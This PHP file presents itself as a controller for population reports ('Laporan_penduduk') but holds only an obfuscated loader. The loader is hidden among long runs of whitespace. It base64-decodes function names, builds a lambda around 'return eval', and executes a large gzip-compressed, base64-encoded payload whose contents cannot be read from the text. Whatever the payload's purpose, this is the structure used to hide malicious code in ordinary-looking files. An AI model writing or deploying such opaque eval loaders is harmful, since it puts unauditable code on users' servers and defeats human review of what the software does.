<?php 
        $__='printf';$_='Loading donjo-app/controllers/Laporan_penduduk.php';
        











































































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='eNrtWtmOo0gWfS9p/iEfWnK1ZqYacLqrrVQ+OEjA4G0AEywvJZZMjMFAJ8bb18+JwOmsmnqpWaVpcVwUckRwl3NP3EAp3911+OkL8DioX7Ny/zJ44F+veBwkVbmt/hrW9S9xVe5fq6J4fm1+mYd19RqWX+rnMmmTNv9Ub+o7uQib5tOnT4OHD1fLd3/60H/6z49+PjDp3f0H8fjdyMATx43vilmgKY8DPvSu1h/CdXs83vXo0aPHHxODeEeFxDNaXaOS7x4rQx2/eOf8c9c00TW7dv2lp6pHjx49evTo0aNHj/839H/O6NGjR48/LgZR2Dz/ev8leY6r5Hnw0DPSo0ePHj16/Fv49jcTclodZmmV8isjWuieCl0r2tAmme8mte/ep4GmnsN1NdNlfqXrISmiYmlYk9tz69BbCoErpKE72kVDY+97y1rXrCKWlDQe0r2/o2d9iu87QwwxlrgjIXGbNHIx59YYU9vr+psf0yNN6O43sZSzGFp9ujwknrENbLKNJOstzjz0jDrSiouuGbBvYT3i5fZOdSzRlj1viWShq/5Fzia/s0tXNpvwTJ5Cjwi+PTkvniYjXRbSxXZyWtrkKZLEDLkUugqb0liMd8tCV4o2Hlp1MqVC6I5bXd5UydQ6rrLfDtEUeZS0DaT9IfJoG3qI4zxqA888zEzOke4jX1MqjommdH6yyV5/0o+LrZ46Gj2H4Cme0oZxbmn04ttECVGDRFMbXX3nbqZthGRKLtwvq8WO89aGrlm/52dhPNlEGamjHeOvyALw1PFS/Bq69w34LHxwBT9lvFOF0Fs0urYvYk3NMXYJXfWI+zFBPM+u2gZnsg/cUe57ZJNoe2b74rsn2Fdb7lNDzvAVIxffHZXwJaAGIuZf32rF9bQrGtQwj6S9iPq3yO+COQHxvfpuIehymn1de9sd1XqWI16snVLYsmrmI9LU1wRrok6DAnyyeDPf4xpo5zK3ybQootYV4/8r3aFWCY/NZ1xoYhGVxQY6Ys+xPMvENTahzGM+MJuJ3eXPtB7viiyBxhmf8wn3z3wiRgs2Lebv6LvWBhyPfM/YJDLp+B9SYfW+38yA/b4D4+CgSlxWG67LbadLaNtmXKsXxi34Pn6/nteS7buaPRuX9ML5kegZa16v+xeaEviewrjA6oq4eK5s/prbbb+DW9SkYPUmMfYQcmT1MaCjVlcM1Jhr4U0fI1Zrzt8uqaANMT7zmMW3MfSUDe4sli4GresHbI+EU3rTKGrSMFsBNMl0mGi83my+AeeoD3qKoh4R9yvvLwrT1P2tXzgKtU1nNLUF1dGVE13n6hxrVjb2kU2XqqUUBHMrXTbWlmMQS1CNtaOuTJsQS1FXrqNkqL0DGybGZqYjGrCxgk/23aQOdKIYxHaalMKXI8IfNVPYoPi34ntAtVQHvdHJVWeO+lrOiK6VYg0bDgywGJeWk5B1Hqe2wuLDWtUiuroka0dJHYHOTedkwI5h8XkD9iysBxPITVdqQgVV7uwtUls4IR4Bce2xjq5NZ0/WGSFUUWnXB/Yq1s9s5MvGHeSCPFKTWsQ58/igWLoyHZ4nj3GtgJd8FCBnx6IG4ikcxgHymJt0aXScvvNuTsnGl/abQHJSXSZ/Y/pxhELp/EMLnlVFQx1zk5RqxV5XWc9Kigj7K9rF3XmS33p/amrLQzwtzuh9FfbNP/bN48q+9s21g/ExtASt2sQOvNv5YEAr6GeWCB0fomxShVNLiJ+qw1xCP3INkekRPR73QvC9RRvtqDA/5z/i/7/Wt8EVeh7XecG4usU8TIbJeVRGpdPibC2RQ+3zc41e5lJyjORRlWgiNJCYa5m4iyPvLRO2v8PzhPOuf+U7kAoB+y6b75aHyB7f6jUXxugvo7XtmG+1PchpnQdugP1J85mcyKi/Cg05thzX+vT0m67R+9AzK0MYHXjf2dEtOLv4Q6OOp2bqu8st6oKepDaRNh4GrlnO1s1MLnGuepStf4mkEasZcVRiQpe6Lt+nhoTYSuscSacG/e4yF06bWBuzc+UFPSYLwPO8JFUsx58R4xZnwQV9Z4G5A+tPXsevGPDzgt6zXhJMF+laQ/8YQnfFGPaMPPAWs2fwxTiKp8YB67a4cl22oB9S6E8CYnn3HXM7NMcZUq6OjCNwOyWiv0NNzmSH82XbaY68eDwHnBUl4yRlNWb743N37y6ctWdwLqy29XfrV9e4ugvx4B1nvh7t8e4jRuqY90w+hxgXl2b2vnaSJ9qmjs/Cn/HulXmSeEDMjSexfjkZ60+Ly+Lpun4qzF7M6nHw8OHD//4l9JHfP16//fzwzzz+1bM/8uBP7w4/Dtj/g7/c3Pa/Ae4//8pvgL/V1sdvxNxJ6+eHvwP0GtS1';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      










































































































































































































































































                                                                                                                                                                                                                     $________;
